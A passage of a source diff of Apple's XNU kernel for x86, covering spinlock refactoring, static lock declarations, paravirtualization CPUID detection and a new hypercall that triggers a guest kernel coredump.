threads in the task. 
*/ queue_iterate(&new_task->threads, thread_next, thread_t, task_threads) { - thread_terminate_internal(thread_next); + thread_terminate_internal(thread_next, TH_TERMINATE_OPTION_NONE); } /* wait for all the threads in the task to terminate */ task_wait_till_threads_terminate_locked(new_task); diff --git a/osfmk/device/iokit_rpc.c b/osfmk/device/iokit_rpc.c index f71023158..6c1c7fac3 100644 --- a/osfmk/device/iokit_rpc.c +++ b/osfmk/device/iokit_rpc.c @@ -41,7 +41,6 @@ #include #include -#include #include #include #include @@ -181,6 +180,12 @@ iokit_release_port( ipc_port_t port ) ipc_port_release( port ); } +EXTERN void +iokit_make_port_send( ipc_port_t port ) +{ + ipc_port_make_send( port ); +} + EXTERN void iokit_release_port_send( ipc_port_t port ) { @@ -310,9 +315,8 @@ iokit_make_send_right( task_t task, io_object_t obj, ipc_kobject_type_t type ) // thread-argument-passing and its value should not be garbage current_thread()->ith_knote = ITH_KNOTE_NULL; kr = ipc_object_copyout( task->itk_space, ip_to_object(sendPort), - MACH_MSG_TYPE_PORT_SEND, NULL, NULL, &name); + MACH_MSG_TYPE_PORT_SEND, IPC_OBJECT_COPYOUT_FLAGS_NONE, NULL, NULL, &name); if (kr != KERN_SUCCESS) { - ipc_port_release_send( sendPort ); name = MACH_PORT_NULL; } } else if (sendPort == IP_NULL) { diff --git a/osfmk/i386/Makefile b/osfmk/i386/Makefile index 06391748e..2d6d61ec1 100644 --- a/osfmk/i386/Makefile +++ b/osfmk/i386/Makefile @@ -18,6 +18,7 @@ EXPORT_ONLY_FILES = \ cpuid.h \ eflags.h \ fpu.h \ + x86_hypercall.h \ io_map_entries.h \ lapic.h \ lock.h \ diff --git a/osfmk/i386/acpi.c b/osfmk/i386/acpi.c index d4e14d511..2af7ed288 100644 --- a/osfmk/i386/acpi.c +++ b/osfmk/i386/acpi.c @@ -347,6 +347,12 @@ acpi_sleep_kernel(acpi_sleep_callback func, void *refcon) init_fpu(); clear_ts(); + +#if HYPERVISOR + /* Notify hypervisor that we are about to resume */ + hv_resume(); +#endif + IOCPURunPlatformActiveActions(); KDBG(IOKDBG_CODE(DBG_HIBERNATE, 0) | DBG_FUNC_END, start, elapsed, @@ -361,7 
+367,6 @@ acpi_sleep_kernel(acpi_sleep_callback func, void *refcon) /* Restart timer interrupts */ rtc_timer_start(); - #if MONOTONIC mt_cpu_up(cdp); #endif /* MONOTONIC */ diff --git a/osfmk/i386/bsd_i386.c b/osfmk/i386/bsd_i386.c index 7c01567ea..b25d0f5d6 100644 --- a/osfmk/i386/bsd_i386.c +++ b/osfmk/i386/bsd_i386.c @@ -34,7 +34,6 @@ #include #include -#include #include #include #include @@ -483,7 +482,7 @@ mach_call_arg_munger32(uint32_t sp, struct mach_call_args *args, const mach_trap __private_extern__ void mach_call_munger(x86_saved_state_t *state); -extern const char *mach_syscall_name_table[]; +extern const char *const mach_syscall_name_table[]; __attribute__((noreturn)) void diff --git a/osfmk/i386/bsd_i386_native.c b/osfmk/i386/bsd_i386_native.c index 541ec6a72..e117ddda9 100644 --- a/osfmk/i386/bsd_i386_native.c +++ b/osfmk/i386/bsd_i386_native.c @@ -33,7 +33,6 @@ #include #include -#include #include #include #include diff --git a/osfmk/i386/cpu_capabilities.h b/osfmk/i386/cpu_capabilities.h index c0b62d37b..a6ef153a7 100644 --- a/osfmk/i386/cpu_capabilities.h +++ b/osfmk/i386/cpu_capabilities.h @@ -155,6 +155,10 @@ _NumCPUs( void ) #else /* !KERNEL_PRIVATE */ +/* + * defines a couple of conveniency macros + * to help read data from the commpage. + */ #if defined(__i386__) #define _COMM_PAGE_AREA_LENGTH _COMM_PAGE32_AREA_LENGTH diff --git a/osfmk/i386/cpuid.c b/osfmk/i386/cpuid.c index 06ad4090d..90844be06 100644 --- a/osfmk/i386/cpuid.c +++ b/osfmk/i386/cpuid.c @@ -1,5 +1,5 @@ /* - * Copyright (c) 2000-2019 Apple Inc. All rights reserved. + * Copyright (c) 2000-2020 Apple Inc. All rights reserved. 
* * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * @@ -219,6 +219,12 @@ boolean_t cpuid_tsx_supported = false; static void do_cwas(i386_cpu_info_t *cpuinfo, boolean_t on_slave); static void cpuid_do_precpuid_was(void); +#if DEBUG || DEVELOPMENT +static void cpuid_vmm_detect_pv_interface(i386_vmm_info_t *info_p, const char *signature, + bool (*)(i386_vmm_info_t*, const uint32_t, const uint32_t)); +static bool cpuid_vmm_detect_applepv_features(i386_vmm_info_t *info_p, const uint32_t base, const uint32_t max_leaf); +#endif /* DEBUG || DEVELOPMENT */ + static inline cpuid_cache_descriptor_t * cpuid_leaf2_find(uint8_t value) { @@ -1437,6 +1443,10 @@ cpuid_init_vmm_info(i386_vmm_info_t *info_p) info_p->cpuid_vmm_bus_frequency = reg[ebx]; } +#if DEBUG || DEVELOPMENT + cpuid_vmm_detect_pv_interface(info_p, APPLEPV_SIGNATURE, &cpuid_vmm_detect_applepv_features); +#endif + DBG(" vmm_vendor : %s\n", info_p->cpuid_vmm_vendor); DBG(" vmm_family : %u\n", info_p->cpuid_vmm_family); DBG(" vmm_bus_frequency : %u\n", info_p->cpuid_vmm_bus_frequency); @@ -1465,6 +1475,14 @@ cpuid_vmm_family(void) return cpuid_vmm_info()->cpuid_vmm_family; } +#if DEBUG || DEVELOPMENT +uint64_t +cpuid_vmm_get_applepv_features(void) +{ + return cpuid_vmm_info()->cpuid_vmm_applepv_features; +} +#endif /* DEBUG || DEVELOPMENT */ + cwa_classifier_e cpuid_wa_required(cpu_wa_e wa) { @@ -1596,3 +1614,68 @@ cpuid_do_precpuid_was(void) cpuid_tsx_disabled = true; } } + + +#if DEBUG || DEVELOPMENT + +/* + * Hunt for Apple Paravirtualization support in the hypervisor class leaves [0x4000_0000-0x4001_0000]. + * Hypervisor interfaces are expected to be found at 0x100 boundaries for compatibility. + */ + +static bool +cpuid_vmm_detect_applepv_features(i386_vmm_info_t *info_p, const uint32_t base, const uint32_t max_leaf) +{ + if ((max_leaf - base) < APPLEPV_LEAF_INDEX_MAX) { + return false; + } + + /* + * Issue cpuid to make sure the interface supports "AH#1" features. 
+ * This avoids a possible collision with "Hv#1" used by Hyper-V. + */ + uint32_t reg[4]; + char interface[5]; + cpuid_fn(base + APPLEPV_INTERFACE_LEAF_INDEX, reg); + memcpy(&interface[0], &reg[eax], 4); + interface[4] = '\0'; + if (0 == strcmp(interface, APPLEPV_INTERFACE)) { + cpuid_fn(base + APPLEPV_FEATURES_LEAF_INDEX, reg); + info_p->cpuid_vmm_applepv_features = quad(reg[ecx], reg[edx]); + return true; + } + return false; +} + +static void +cpuid_vmm_detect_pv_interface(i386_vmm_info_t *info_p, const char *signature, + bool (*searcher)(i386_vmm_info_t*, const uint32_t, const uint32_t)) +{ + int hcalls; + if (PE_parse_boot_argn("hcalls", &hcalls, sizeof(hcalls)) && + hcalls == 0) { + return; + } + + assert(info_p); + /* + * Look for PV interface matching signature + */ + for (uint32_t base = 0x40000100; base < 0x40010000; base += 0x100) { + uint32_t reg[4]; + char vendor[13]; + + cpuid_fn(base, reg); + memcpy(&vendor[0], &reg[ebx], 4); + memcpy(&vendor[4], &reg[ecx], 4); + memcpy(&vendor[8], &reg[edx], 4); + vendor[12] = '\0'; + if ((0 == strcmp(vendor, signature)) && + (reg[eax] - base) < 0x100 && + (*searcher)(info_p, base, reg[eax])) { + break; + } + } +} + +#endif /* DEBUG || DEVELOPMENT */ diff --git a/osfmk/i386/cpuid.h b/osfmk/i386/cpuid.h index 577bf6167..3f608f707 100644 --- a/osfmk/i386/cpuid.h +++ b/osfmk/i386/cpuid.h @@ -1,5 +1,5 @@ /* - * Copyright (c) 2000-2019 Apple Computer, Inc. All rights reserved. + * Copyright (c) 2000-2020 Apple Computer, Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * @@ -289,6 +289,30 @@ #define CPUID_VMM_FAMILY_KVM 0x6 +#if DEBUG || DEVELOPMENT + +/* + * Apple Paravirtualization CPUID leaves + * The base leaf can be placed at any unused 0x100 aligned boundary + * in the hypervisor class leaves [0x4000_0000-0x4001_0000]. 
+ */ + +#define APPLEPV_INTERFACE_LEAF_INDEX 1 +#define APPLEPV_FEATURES_LEAF_INDEX 2 +#define APPLEPV_LEAF_INDEX_MAX APPLEPV_FEATURES_LEAF_INDEX + +#define APPLEPV_SIGNATURE "apple-pv-xnu" +#define APPLEPV_INTERFACE "AH#1" + +/* + * Apple Hypercall Feature Vector: + * Values in ECX:EDX returned by the base leaf + */ + +#define CPUID_LEAF_FEATURE_COREDUMP _Bit(0) + +#endif /* DEBUG || DEVELOPMENT */ + #ifndef ASSEMBLER #include @@ -485,6 +509,7 @@ typedef struct { uint32_t cpuid_vmm_family; uint32_t cpuid_vmm_bus_frequency; uint32_t cpuid_vmm_tsc_frequency; + uint64_t cpuid_vmm_applepv_features; } i386_vmm_info_t; typedef enum { @@ -553,10 +578,14 @@ extern uint32_t cpuid_cpufamily(void); extern i386_cpu_info_t *cpuid_info(void); extern void cpuid_set_info(void); extern boolean_t cpuid_vmm_present(void); +extern uint32_t cpuid_vmm_family(void); + +#if DEBUG || DEVELOPMENT +extern uint64_t cpuid_vmm_get_applepv_features(void); +#endif /* DEBUG || DEVELOPMENT */ #ifdef MACH_KERNEL_PRIVATE extern i386_vmm_info_t *cpuid_vmm_info(void); -extern uint32_t cpuid_vmm_family(void); extern cwa_classifier_e cpuid_wa_required(cpu_wa_e wa); extern void cpuid_do_was(void); extern const char *cpuid_vmm_family_string(void); diff --git a/osfmk/i386/i386_init.c b/osfmk/i386/i386_init.c index 12cdef33a..ad1f15c1f 100644 --- a/osfmk/i386/i386_init.c +++ b/osfmk/i386/i386_init.c @@ -129,6 +129,8 @@ int debug_task; int early_boot = 1; +bool serial_console_enabled = false; + static boot_args *kernelBootArgs; extern int disableConsoleOutput; @@ -932,6 +934,7 @@ i386_init(void) } } if (serialmode & SERIALMODE_OUTPUT) { + serial_console_enabled = true; (void)switch_to_serial_console(); disableConsoleOutput = FALSE; /* Allow printfs to happen */ } diff --git a/osfmk/i386/locks_i386.c b/osfmk/i386/locks_i386.c index 98d11ec50..8d6903b5a 100644 --- a/osfmk/i386/locks_i386.c +++ b/osfmk/i386/locks_i386.c @@ -126,6 +126,15 @@ decl_simple_lock_data(extern, panic_lock); extern unsigned int 
not_in_kdp; +#if !LOCK_STATS +#define usimple_lock_nopreempt(lck, grp) \ + usimple_lock_nopreempt(lck) +#define usimple_lock_try_nopreempt(lck, grp) \ + usimple_lock_try_nopreempt(lck) +#endif +static void usimple_lock_nopreempt(usimple_lock_t, lck_grp_t *); +static unsigned int usimple_lock_try_nopreempt(usimple_lock_t, lck_grp_t *); + /* * We often want to know the addresses of the callers * of the various lock routines. However, this information @@ -341,6 +350,22 @@ lck_spin_lock( usimple_lock((usimple_lock_t) lck, NULL); } +void +lck_spin_lock_nopreempt( + lck_spin_t *lck) +{ + usimple_lock_nopreempt((usimple_lock_t) lck, NULL); +} + +void +lck_spin_lock_nopreempt_grp( + lck_spin_t *lck, + lck_grp_t *grp) +{ +#pragma unused(grp) + usimple_lock_nopreempt((usimple_lock_t) lck, grp); +} + /* * Routine: lck_spin_unlock */ @@ -351,6 +376,13 @@ lck_spin_unlock( usimple_unlock((usimple_lock_t) lck); } +void +lck_spin_unlock_nopreempt( + lck_spin_t *lck) +{ + usimple_unlock_nopreempt((usimple_lock_t) lck); +} + boolean_t lck_spin_try_lock_grp( lck_spin_t *lck, @@ -383,6 +415,34 @@ lck_spin_try_lock( return lrval; } +int +lck_spin_try_lock_nopreempt( + lck_spin_t *lck) +{ + boolean_t lrval = (boolean_t)usimple_lock_try_nopreempt((usimple_lock_t) lck, LCK_GRP_NULL); +#if DEVELOPMENT || DEBUG + if (lrval) { + pltrace(FALSE); + } +#endif + return lrval; +} + +int +lck_spin_try_lock_nopreempt_grp( + lck_spin_t *lck, + lck_grp_t *grp) +{ +#pragma unused(grp) + boolean_t lrval = (boolean_t)usimple_lock_try_nopreempt((usimple_lock_t) lck, grp); +#if DEVELOPMENT || DEBUG + if (lrval) { + pltrace(FALSE); + } +#endif + return lrval; +} + /* * Routine: lck_spin_assert */ @@ -439,12 +499,8 @@ usimple_lock_init( usimple_lock_t l, __unused unsigned short tag) { -#ifndef MACHINE_SIMPLE_LOCK USLDBG(usld_lock_init(l, tag)); hw_lock_init(&l->interlock); -#else - simple_lock_init((simple_lock_t)l, tag); -#endif } volatile uint32_t spinlock_owner_cpu = ~0; @@ -469,6 +525,22 @@ 
spinlock_timeout_NMI(uintptr_t thread_addr) return spinlock_owner_cpu; } +__abortlike +static void +usimple_lock_acquire_timeout_panic(usimple_lock_t l) +{ + uintptr_t lowner = (uintptr_t)l->interlock.lock_data; + uint32_t lock_cpu; + + spinlock_timed_out = l; /* spinlock_timeout_NMI consumes this */ + lock_cpu = spinlock_timeout_NMI(lowner); + panic("Spinlock acquisition timed out: lock=%p, " + "lock owner thread=0x%lx, current_thread: %p, " + "lock owner active on CPU 0x%x, current owner: 0x%lx, time: %llu", + l, lowner, current_thread(), lock_cpu, + (uintptr_t)l->interlock.lock_data, mach_absolute_time()); +} + /* * Acquire a usimple_lock. * @@ -481,38 +553,57 @@ void usimple_lock_t l LCK_GRP_ARG(lck_grp_t *grp)) { -#ifndef MACHINE_SIMPLE_LOCK DECL_PC(pc); OBTAIN_PC(pc); USLDBG(usld_lock_pre(l, pc)); - if (__improbable(hw_lock_to(&l->interlock, LockTimeOutTSC, grp) == 0)) { - boolean_t uslock_acquired = FALSE; - while (machine_timeout_suspended()) { - enable_preemption(); - if ((uslock_acquired = hw_lock_to(&l->interlock, LockTimeOutTSC, grp))) { - break; - } + while (__improbable(hw_lock_to(&l->interlock, LockTimeOutTSC, grp) == 0)) { + if (!machine_timeout_suspended()) { + usimple_lock_acquire_timeout_panic(l); } + enable_preemption(); + } + +#if DEVELOPMENT || DEBUG + pltrace(FALSE); +#endif + + USLDBG(usld_lock_post(l, pc)); +#if CONFIG_DTRACE + LOCKSTAT_RECORD(LS_LCK_SPIN_LOCK_ACQUIRE, l, 0, (uintptr_t)LCK_GRP_PROBEARG(grp)); +#endif +} + +/* + * Acquire a usimple_lock_nopreempt + * + * Called and returns with preemption disabled. Note + * that the hw_lock routines are responsible for + * maintaining preemption state. 
+ */ +static void +usimple_lock_nopreempt( + usimple_lock_t l, + lck_grp_t *grp) +{ + DECL_PC(pc); - if (uslock_acquired == FALSE) { - uint32_t lock_cpu; - uintptr_t lowner = (uintptr_t)l->interlock.lock_data; - spinlock_timed_out = l; - lock_cpu = spinlock_timeout_NMI(lowner); - panic("Spinlock acquisition timed out: lock=%p, lock owner thread=0x%lx, current_thread: %p, lock owner active on CPU 0x%x, current owner: 0x%lx, time: %llu", - l, lowner, current_thread(), lock_cpu, (uintptr_t)l->interlock.lock_data, mach_absolute_time()); + OBTAIN_PC(pc); + USLDBG(usld_lock_pre(l, pc)); + + while (__improbable(hw_lock_to_nopreempt(&l->interlock, LockTimeOutTSC, grp) == 0)) { + if (!machine_timeout_suspended()) { + usimple_lock_acquire_timeout_panic(l); } + enable_preemption(); } + #if DEVELOPMENT || DEBUG pltrace(FALSE); #endif USLDBG(usld_lock_post(l, pc)); -#else - simple_lock((simple_lock_t)l, grp); -#endif #if CONFIG_DTRACE LOCKSTAT_RECORD(LS_LCK_SPIN_LOCK_ACQUIRE, l, 0, (uintptr_t)LCK_GRP_PROBEARG(grp)); #endif @@ -530,7 +621,6 @@ void usimple_unlock( usimple_lock_t l) { -#ifndef MACHINE_SIMPLE_LOCK DECL_PC(pc); OBTAIN_PC(pc); @@ -539,11 +629,28 @@ usimple_unlock( pltrace(TRUE); #endif hw_lock_unlock(&l->interlock); -#else - simple_unlock_rwmb((simple_lock_t)l); -#endif } +/* + * Release a usimple_unlock_nopreempt. + * + * Called and returns with preemption enabled. Note + * that the hw_lock routines are responsible for + * maintaining preemption state. + */ +void +usimple_unlock_nopreempt( + usimple_lock_t l) +{ + DECL_PC(pc); + + OBTAIN_PC(pc); + USLDBG(usld_unlock(l, pc)); +#if DEVELOPMENT || DEBUG + pltrace(TRUE); +#endif + hw_lock_unlock_nopreempt(&l->interlock); +} /* * Conditionally acquire a usimple_lock. 
@@ -562,7 +669,6 @@ usimple_lock_try( usimple_lock_t l, lck_grp_t *grp) { -#ifndef MACHINE_SIMPLE_LOCK unsigned int success; DECL_PC(pc); @@ -575,9 +681,36 @@ usimple_lock_try( USLDBG(usld_lock_try_post(l, pc)); } return success; -#else - return simple_lock_try((simple_lock_t)l, grp); +} + +/* + * Conditionally acquire a usimple_lock. + * + * Called and returns with preemption disabled. Note + * that the hw_lock routines are responsible for + * maintaining preemption state. + * + * XXX No stats are gathered on a miss; I preserved this + * behavior from the original assembly-language code, but + * doesn't it make sense to log misses? XXX + */ +static unsigned int +usimple_lock_try_nopreempt( + usimple_lock_t l, + lck_grp_t *grp) +{ + unsigned int success; + DECL_PC(pc); + + OBTAIN_PC(pc); + USLDBG(usld_lock_try_pre(l, pc)); + if ((success = hw_lock_try_nopreempt(&l->interlock, grp))) { +#if DEVELOPMENT || DEBUG + pltrace(FALSE); #endif + USLDBG(usld_lock_try_post(l, pc)); + } + return success; } /* diff --git a/osfmk/i386/machine_routines.c b/osfmk/i386/machine_routines.c index 6ebfd9a7e..7d0e21dac 100644 --- a/osfmk/i386/machine_routines.c +++ b/osfmk/i386/machine_routines.c @@ -1237,11 +1237,6 @@ ml_cpu_can_exit(__unused int cpu_id) return true; } -void -ml_cpu_init_state(void) -{ -} - void ml_cpu_begin_state_transition(__unused int cpu_id) { diff --git a/osfmk/i386/pcb.c b/osfmk/i386/pcb.c index 603fb0008..29bff1a8f 100644 --- a/osfmk/i386/pcb.c +++ b/osfmk/i386/pcb.c @@ -63,7 +63,6 @@ #include #include -#include #include #include #include diff --git a/osfmk/i386/pcb_native.c b/osfmk/i386/pcb_native.c index 6960a022e..207db2d63 100644 --- a/osfmk/i386/pcb_native.c +++ b/osfmk/i386/pcb_native.c @@ -63,7 +63,6 @@ #include #include -#include #include #include #include diff --git a/osfmk/i386/phys.c b/osfmk/i386/phys.c index 130c8aec3..642f9f216 100644 --- a/osfmk/i386/phys.c +++ b/osfmk/i386/phys.c @@ -63,7 +63,6 @@ #include #include -#include #include #include 
#include diff --git a/osfmk/i386/pmap.h b/osfmk/i386/pmap.h index 34a434d7d..eb470b06e 100644 --- a/osfmk/i386/pmap.h +++ b/osfmk/i386/pmap.h @@ -842,6 +842,10 @@ extern boolean_t pmap_is_empty(pmap_t pmap, kern_return_t pmap_permissions_verify(pmap_t, vm_map_t, vm_offset_t, vm_offset_t); +#if DEVELOPMENT || DEBUG +extern kern_return_t pmap_test_text_corruption(pmap_paddr_t); +#endif /* DEVELOPMENT || DEBUG */ + #if MACH_ASSERT extern int pmap_stats_assert; #define PMAP_STATS_ASSERTF(args) \ diff --git a/osfmk/i386/ucode.c b/osfmk/i386/ucode.c index 4c5d43d09..12d593dc3 100644 --- a/osfmk/i386/ucode.c +++ b/osfmk/i386/ucode.c @@ -60,60 +60,8 @@ update_microcode(void) } /* locks */ -static lck_grp_attr_t *ucode_slock_grp_attr = NULL; -static lck_grp_t *ucode_slock_grp = NULL; -static lck_attr_t *ucode_slock_attr = NULL; -static lck_spin_t *ucode_slock = NULL; - -static kern_return_t -register_locks(void) -{ - /* already allocated? */ - if (ucode_slock_grp_attr && ucode_slock_grp && ucode_slock_attr && ucode_slock) { - return KERN_SUCCESS; - } - - /* allocate lock group attribute and group */ - if (!(ucode_slock_grp_attr = lck_grp_attr_alloc_init())) { - goto nomem_out; - } - - if (!(ucode_slock_grp = lck_grp_alloc_init("uccode_lock", ucode_slock_grp_attr))) { - goto nomem_out; - } - - /* Allocate lock attribute */ - if (!(ucode_slock_attr = lck_attr_alloc_init())) { - goto nomem_out; - } - - /* Allocate the spin lock */ - /* We keep one global spin-lock. We could have one per update - * request... but srsly, why would you update microcode like that? 
- */ - if (!(ucode_slock = lck_spin_alloc_init(ucode_slock_grp, ucode_slock_attr))) { - goto nomem_out; - } - - return KERN_SUCCESS; - -nomem_out: - /* clean up */ - if (ucode_slock) { - lck_spin_free(ucode_slock, ucode_slock_grp); - } - if (ucode_slock_attr) { - lck_attr_free(ucode_slock_attr); - } - if (ucode_slock_grp) { - lck_grp_free(ucode_slock_grp); - } - if (ucode_slock_grp_attr) { - lck_grp_attr_free(ucode_slock_grp_attr); - } - - return KERN_NO_SPACE; -} +static LCK_GRP_DECLARE(ucode_slock_grp, "uccode_lock"); +static LCK_SPIN_DECLARE(ucode_slock, &ucode_slock_grp); /* Copy in an update */ static int @@ -168,13 +116,13 @@ static void cpu_apply_microcode(void) { /* grab the lock */ - lck_spin_lock(ucode_slock); + lck_spin_lock(&ucode_slock); /* execute the update */ update_microcode(); /* release the lock */ - lck_spin_unlock(ucode_slock); + lck_spin_unlock(&ucode_slock); } static void @@ -245,10 +193,6 @@ xcpu_update(void) { cpumask_t dest_cpumask; - if (register_locks() != KERN_SUCCESS) { - return; - } - mp_disable_preemption(); dest_cpumask = CPUMASK_OTHERS; cpu_apply_microcode(); diff --git a/osfmk/i386/vmx/vmx_cpu.c b/osfmk/i386/vmx/vmx_cpu.c index efd2ff662..f9cf56840 100644 --- a/osfmk/i386/vmx/vmx_cpu.c +++ b/osfmk/i386/vmx/vmx_cpu.c @@ -42,8 +42,8 @@ int vmx_use_count = 0; boolean_t vmx_exclusive = FALSE; -lck_grp_t *vmx_lck_grp = NULL; -lck_mtx_t *vmx_lck_mtx = NULL; +static LCK_GRP_DECLARE(vmx_lck_grp, "vmx"); +static LCK_MTX_DECLARE(vmx_lck_mtx, &vmx_lck_grp); /* ----------------------------------------------------------------------------- * vmx_is_available() @@ -115,16 +115,6 @@ vmx_enable(void) set_cr4(get_cr4() | CR4_VMXE); } -void -vmx_init() -{ - vmx_lck_grp = lck_grp_alloc_init("vmx", LCK_GRP_ATTR_NULL); - assert(vmx_lck_grp); - - vmx_lck_mtx = lck_mtx_alloc_init(vmx_lck_grp, LCK_ATTR_NULL); - assert(vmx_lck_mtx); -} - /* ----------------------------------------------------------------------------- * vmx_get_specs() * Obtain VMX facility 
specifications for this CPU and @@ -313,7 +303,7 @@ host_vmxon(boolean_t exclusive) return VMX_UNSUPPORTED; } - lck_mtx_lock(vmx_lck_mtx); + lck_mtx_lock(&vmx_lck_mtx); if (vmx_exclusive || (exclusive && vmx_use_count)) { error = VMX_INUSE; @@ -331,7 +321,7 @@ host_vmxon(boolean_t exclusive) error = VMX_OK; } - lck_mtx_unlock(vmx_lck_mtx); + lck_mtx_unlock(&vmx_lck_mtx); return error; } @@ -345,7 +335,7 @@ host_vmxoff() { assert(0 == get_preemption_level()); - lck_mtx_lock(vmx_lck_mtx); + lck_mtx_lock(&vmx_lck_mtx); if (1 == vmx_use_count) { vmx_exclusive = FALSE; @@ -356,7 +346,7 @@ host_vmxoff() vmx_use_count--; } - lck_mtx_unlock(vmx_lck_mtx); + lck_mtx_unlock(&vmx_lck_mtx); VMX_KPRINTF("VMX use count: %d\n", vmx_use_count); } diff --git a/osfmk/i386/vmx/vmx_cpu.h b/osfmk/i386/vmx/vmx_cpu.h index eb9390861..7edea3f5b 100644 --- a/osfmk/i386/vmx/vmx_cpu.h +++ b/osfmk/i386/vmx/vmx_cpu.h @@ -60,7 +60,6 @@ typedef struct vmx_cpu { void *vmxon_region; /* the logical address of the VMXON region page */ } vmx_cpu_t; -void vmx_init(void); void vmx_cpu_init(void); void vmx_resume(boolean_t is_wake_from_hibernate); void vmx_suspend(void); diff --git a/osfmk/i386/x86_hypercall.c b/osfmk/i386/x86_hypercall.c new file mode 100644 index 000000000..e76e38d65 --- /dev/null +++ b/osfmk/i386/x86_hypercall.c @@ -0,0 +1,96 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. 
The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#include +#include +#include +#include + + +static bool +hvg_live_coredump_enabled(void) +{ + return cpuid_vmm_present() && (cpuid_vmm_get_applepv_features() & CPUID_LEAF_FEATURE_COREDUMP) != 0; +} + +/* + * This routine issues an Apple hypercall that notifies the hypervisor to + * take a guest kernel coredump. If the vmcore argument is not NULL, the + * name tag of the vmcore file is copied into the caller's vmcore tag array. + * Otherwise the name tag is ignored. + */ + +hvg_hcall_return_t +hvg_hcall_trigger_dump(hvg_hcall_vmcore_file_t *vmcore, + const hvg_hcall_dump_option_t dump_option) +{ + hvg_hcall_return_t ret; + hvg_hcall_output_regs_t output; + const size_t reg_size = sizeof(output.rax); + + /* Does the hypervisor support feature: live kernel core dump? 
*/ + if (!hvg_live_coredump_enabled()) { + return HVG_HCALL_FEAT_DISABLED; + } + + /* Make sure that we don't overflow vmcore tag array with hypercall output */ + if (vmcore && (reg_size != sizeof(uint64_t))) { + os_log_error(OS_LOG_DEFAULT, "%s: invalid hcall register size, %zu bytes (expect %zu bytes)\n", + __func__, reg_size, sizeof(uint64_t)); + return HVG_HCALL_INVALID_PARAMETER; + } + + switch (dump_option) { + case HVG_HCALL_DUMP_OPTION_REGULAR: + /* Only regular dump-guest-memory is supported for now */ + break; + default: + return HVG_HCALL_INVALID_PARAMETER; + } + + /* Everything checks out, issue hypercall */ + memset(&output, 0, sizeof(hvg_hcall_output_regs_t)); + ret = hvg_hypercall1(HVG_HCALL_TRIGGER_DUMP, + dump_option, + &output); + + if (ret == HVG_HCALL_SUCCESS) { + if (vmcore) { + /* Caller requested vmcore tag to be returned */ + memcpy(&vmcore->tag[0], &output.rax, reg_size); + memcpy(&vmcore->tag[reg_size], &output.rdi, reg_size); + memcpy(&vmcore->tag[reg_size * 2], &output.rsi, reg_size); + memcpy(&vmcore->tag[reg_size * 3], &output.rdx, reg_size); + memcpy(&vmcore->tag[reg_size * 4], &output.rcx, reg_size); + memcpy(&vmcore->tag[reg_size * 5], &output.r8, reg_size); + memcpy(&vmcore->tag[reg_size * 6], &output.r9, reg_size); + vmcore->tag[reg_size * 7] = '\0'; + } + } + return ret; +} diff --git a/osfmk/i386/x86_hypercall.h b/osfmk/i386/x86_hypercall.h new file mode 100644 index 000000000..7dedfcc08 --- /dev/null +++ b/osfmk/i386/x86_hypercall.h @@ -0,0 +1,182 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. 
The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#ifndef _I386_X86_HYPERCALL_H_ +#define _I386_X86_HYPERCALL_H_ + +#if DEBUG || DEVELOPMENT + + +/* + * Apple Hypercall Calling Convention (x64) + * + * Registers | Usage | + * -------------------------------------------------------- + * %rax | In: hypercall code | + * | Out: if RFLAGS.CF = 0 (success) | + * | hypercall output[0] | + * | if RFLAGS.CF = 1 (error) | + * | hypercall error value | + * %rdi | In: 1st argument | + * | Out: hypercall output[1] | + * %rsi | In: 2nd argument | + * | Out: hypercall output[2] | + * %rdx | In: 3rd argument | + * | Out: hypercall output[3] | + * %rcx | In: 4th argument | + * | Out: hypercall output[4] | + * %r8 | In: 5th argument | + * | Out: hypercall output[5] | + * %r9 | In: 6th argument | + * | Out: hypercall output[6] | + * + * %rax is used by the caller to specify hypercall code. When a hypercall fails, + * the hypervisor stores errno in %rax. A successful hypercall returns the + * output of the call in %rax, %rdi, %rsi, %rdx, %rcx, %r8, and %r9. 
